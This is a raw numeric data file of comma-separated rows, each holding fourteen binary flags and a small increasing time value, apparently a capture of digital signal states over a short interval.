0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8494236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8494260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494268e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494284e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494460e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494484e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494684e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494712e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8494716e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8494760e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8494788e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.8494792e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494796e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494884e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494912e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8494940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8494988e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495020e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495060e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495068e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495084e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495108e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495140e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495160e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495184e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495212e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495260e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495308e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495340e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495360e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495384e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495392e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495484e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495508e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495560e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495584e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495612e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495660e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8495684e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8495708e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495760e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495884e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8495960e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8495984e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496084e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496108e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496160e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496184e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496188e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8496236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496268e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496308e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496360e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496384e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496484e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496492e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8496540e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496560e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496572e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496684e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496740e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8496764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496768e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8496812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8496836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496844e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8496964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8496988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497112e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497140e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8497188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497220e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497340e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8497364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497368e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8497412e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497644e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8497688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497720e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497740e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8497764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497768e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8497812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497844e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8497912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497932e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8497960e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8497984e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8497992e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498084e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498108e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498132e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498160e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498284e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498308e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498332e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498360e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498384e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498440e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8498484e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498508e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498516e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498536e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498560e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498564e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8498612e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498644e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498684e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498708e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498732e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498760e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498784e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498840e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8498884e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8498908e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498936e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8498960e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8498984e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499084e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499108e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499132e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499160e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499184e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499284e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499308e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499332e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499360e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499384e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499460e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499484e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499508e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499532e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499560e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499584e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499684e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8499712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8499740e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8499764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8499768e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,2.8624060e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.8624312e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,2.8624340e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.8624364e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,2.8624660e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8624692e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8624700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8624748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8624772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8624820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8624848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8624900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8624924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8624956e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8624972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8624996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625004e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8625024e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625048e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.8625052e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625056e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625072e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625100e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8625124e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625156e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625276e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625300e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625448e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625452e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8625472e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625500e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.8625504e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625508e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625548e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625552e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8625572e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625604e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625648e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625672e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625876e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8625900e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625904e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8625924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8625948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625956e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8625972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8625996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626004e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8626020e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626272e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626348e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8626352e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626356e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8626372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626404e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626448e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626472e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626596e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626648e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626672e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626796e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626872e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626876e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8626924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8626948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8626956e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8626996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627172e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627180e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8627196e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627228e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627272e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627296e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627324e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627448e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627472e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627476e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8627524e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627556e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627596e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627648e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627652e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8627668e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8627696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627896e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627920e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8627972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8627996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628000e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8628020e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628096e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628120e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628248e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628268e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628296e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628320e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628396e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628444e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628452e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8628496e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628520e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8628548e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628580e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628720e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628796e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628800e-02 